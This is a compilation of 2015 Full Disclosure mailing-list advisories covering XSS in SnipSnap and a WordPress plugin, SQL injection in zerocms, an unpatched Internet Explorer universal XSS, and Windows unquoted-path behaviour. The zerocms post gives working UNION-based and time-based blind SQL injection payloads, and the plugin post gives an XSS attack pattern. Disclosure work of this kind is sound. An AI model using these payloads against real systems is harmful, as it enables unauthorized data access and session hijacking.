[FD] CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities
CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities Exploit Title: SnipSnap /snipsnap-search? query Parameter XSS Product: SnipSnap Vulnerable Versions: 0.5.2a 1.0b1 1.0b2 Tested Version: 0.5.2a 1.0b1 1.0b2 Advisory Publication: Jan 30, 2015 Latest Update: Jan 30, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-9559 Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore] Advisory Details: (1) Vendor Product Description Vendor: SnipSnap Product Version: SnipSnap 0.5.2a 1.0b1 1.0b2 Vendor URL Download: http://snipsnap.org Product Description: SnipSnap is a user friendly content management system with features such as wiki and weblog. (2) Vulnerability Details: SnipSnap has a security problem. It can be exploited by XSS attacks. (2.1) The vulnerability occurs at snipsnap-search? page with query parameter. References: http://tetraph.com/security/cves/cve-2014-9559-snipsnap-xss-cross-site-scripting-security-vulnerabilities/ https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9559 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9559 https://security-tracker.debian.org/tracker/CVE-2014-9559 http://www.cvedetails.com/cve/CVE-2014-9559/ http://www.security-database.com/detail.php?alert=CVE-2014-9559 http://packetstormsecurity.com/files/cve/CVE-2014-9559 http://www.pentest.it/cve-2014-9559.html http://www.naked-security.com/cve/CVE-2014-9559/ http://007software.net/cve-2014-9559/ https://security-tracker.debian.org/tracker/CVE-2014-9559 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] SQL injection vulnerabilities in zerocms = v.1.3.3
Advisory: SQL injection vulnerabilities in zerocms = v.1.3.3 Advisory ID: SROEADV-2015-13 Author: Steffen Rösemann Affected Software: zerocms = v.1.3.3 (released 23rd-Jan-2015) Vendor URL: http://aas9.in/zerocms/ Vendor Status: platform will be moving to Rails4 CVE-ID: - == Vulnerability Description: == Content management system Zerocms v. 1.3.3 suffers from SQL injection vulnerabilities. == Technical Details: == The article_id-parameter used in zero_view_article.php is vulnerable to SQL injection. It is located here in a common Zerocms-installation and can be exploited even by unregistered users: http://{TARGET}/views/zero_view_article.php?article_id=1 Exploit-Example: http:// {TARGET}/views/zero_view_article.php?article_id=-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+ A Blind SQL injection vulnerability can be found the file zero_user_transact.php. The parameter user_id is vulnerable to SQL injection. See the following example POST-request which serves as exploit-example: POST /views/zero_transact_user.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://{TARGET}/views/zero_user_account.php?user_id=2 Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 91 name=useremail=user%40user.deaccess_level=1user_id=2 AND SLEEP(30)action=Modify+Account The Blind SQL injection vulnerability can be exploited on the administrative backend of Zerocms. The vulnerabilities described above have been tested on the following versions of Zerocms: - v. 1.3.2 - v. 1.3.3 = Solution: = Vendor seems not to provide a patch for this vulnerabilities as version 1.3.3 is the last release for this PHP-based platform. It will be developed on the Rails4-platform in future releases (see Github repository, release section). Disclosure Timeline: 23-Jan-2015 – found the vulnerabilities in v.1.3.2 23-Jan-2015 - informed the developers (see [3]) 23-Jan-2015 – release date of this security advisory [without technical details] 23-Jan-2015 - forked the vulnerable version to keep it available for other researchers (see [4]) 23-Jan-2015 - developer released v.1.3.3 of zerocms 24-Jan-2015 - vulnerabilities can also be found in v.1.3.3 29-Jan-2015 - as vendor will move the platform to Rails4, it seems that there will be no patch provided (see [5]) 29-Jan-2015 - release date of this security advisory 29-Jan-2015 - send to FullDisclosure Credits: Vulnerability found and advisory written by Steffen Rösemann. === References: === [1] http://aas9.in/zerocms/ [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-13.html [3] https://github.com/perezkarjee/zerocms/issues/3 [4] https://github.com/sroesemann/zerocms [5] https://twitter.com/sroesemann/status/559273548691546113 ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Major Internet Explorer Vulnerability - NOT Patched
Deusen just published code and description here: http://www.deusen.co.uk/items/insider3show.3362009741042107/ which demonstrates the serious security issue. Summary An Internet Explorer vulnerability is shown here: Content of dailymail.co.uk can be changed by external domain. How To Use 1. Close the popup window(confirm dialog) after three seconds. 2. Click Go. 3. After 7 seconds, Hacked by Deusen is actively injected into dailymail.co.uk. Technical Details Vulnerability: Universal Cross Site Scripting(XSS) Impact: Same Origin Policy(SOP) is completely bypassed Attack: Attackers can steal anything from another domain, and inject anything into another domain Tested: Jan/29/2015 Internet Explorer 11 Windows 7 If you like it, please reply nice. Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Defense in depth -- the Microsoft way (part 27): the command line you get differs from the command line I use to call you
Hi @ll, on Windows, the command line an application receives can differ from the command line the calling application supplies to CreateProcess*(). The documentation of GetCommandLine() https://msdn.microsoft.com/en-us/library/ms683156.aspx tells: | Note The name of the executable in the command line that | the operating system provides to a process is not necessarily | identical to that in the command line that the calling process | gives to the CreateProcess function. The operating system may | prepend a fully qualified path to an executable name that is | provided without a fully qualified path. This is not the whole truth, another Note is missing there: when CreateProcess*() is called using a command line with an UNQUOTED long filename/pathname containing spaces (a well-known VULNERABILITY: https://cwe.mitre.org/data/definitions/428.html) it uses tryerror to guess the pathname of the executable. The documentation of CreateProcess() https://msdn.microsoft.com/en-us/library/ms682425.aspx tells: | [...] the module name must be the first white space-delimited | token in the lpCommandLine string. If you are using a long file | name that contains a space, use quoted strings to indicate where | the file name ends and the arguments begin; otherwise, the file | name is ambiguous. For example, consider the string | c:\program files\sub dir\program name. | This string can be interpreted in a number of ways. The system | tries to interpret the possibilities in the following order: |c:\program.exe files\sub dir\program name |c:\program files\sub.exe dir\program name |c:\program files\sub dir\program.exe name |c:\program files\sub dir\program name.exe In the latter 3 cases the command line is but modified too: Windows adds quotes around the part of the command line which forms the result of this interpretation and yields the path to the executable if this part contains a space. The 4 command lines shown above are transformed into: c:\program.exe files\sub dir\program name c:\program files\sub.exe dir\program name c:\program files\sub dir\program.exe name c:\program files\sub dir\program name.exe JFTR: without this transformation splitting of the command line into the argv vector would give wrong results ... in presense of CreateProcess*() braindead behaviour! Stay tuned! regards Stefan Kanthak PS: the documentation of CommandLineToArgvW() https://msdn.microsoft.com/en-us/library/bb776391.aspx contains a funny and surprising remark: | This function accepts command lines that contain a program name; | the program name can be enclosed in quotation marks or not. This does but NOT mean that CommandLineToArgvW() tries to guess like CreateProcess()! It treats c:\program files\sub dir\program name as c:\program files\sub dir\program name. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Banner Effect Header Security Advisory - XSS Vulnerability - CVE-2015-1384
Information Advisory by Netsparker. Name: XSS Vulnerability in Banner Effect Header Affected Software : Banner Effect Header Affected Versions: 1.2.7 and possibly below Vendor Homepage : https://wordpress.org/plugins/banner-effect-header/ Vulnerability Type : Cross-site Scripting Severity : Important CVE-ID: CVE-2015-1384 Netsparker Advisory Reference : NS-15-002 Description --- By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session. This means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. As seen from the XSS example in this article, if a web application is vulnerable to cross-site scripting and the administrator’s session is hijacked, the malicious hacker exploiting the vulnerability will have full admin privileges on that web application. Technical Details - Proof of Concept URLs for XSS in Banner Effect Header: URL: /wp-admin/options-general.php?page=BannerEffectOptions Parameter Name: banner_effect_divid Parameter Type: Post Attack Pattern: onclick=alert(1) For more information on cross-site scripting vulnerabilities read the following article on Cross-site Scripting (XSS) - https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/ Advisory Timeline 21/01/2015 - First Contact 29/01/2015 - Vulnerability fixed 29/01/2015 - Advisory released Solution Download version 1.2.8 which includes fix for this vulnerability. Credits Authors - These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner - https://www.netsparker.com/web-vulnerability-scanner/ About Netsparker Netsparker finds and reports security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities, hence it is the first and only False Positive Free web application security scanner. For more information visit our website on https://www.netsparker.com ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/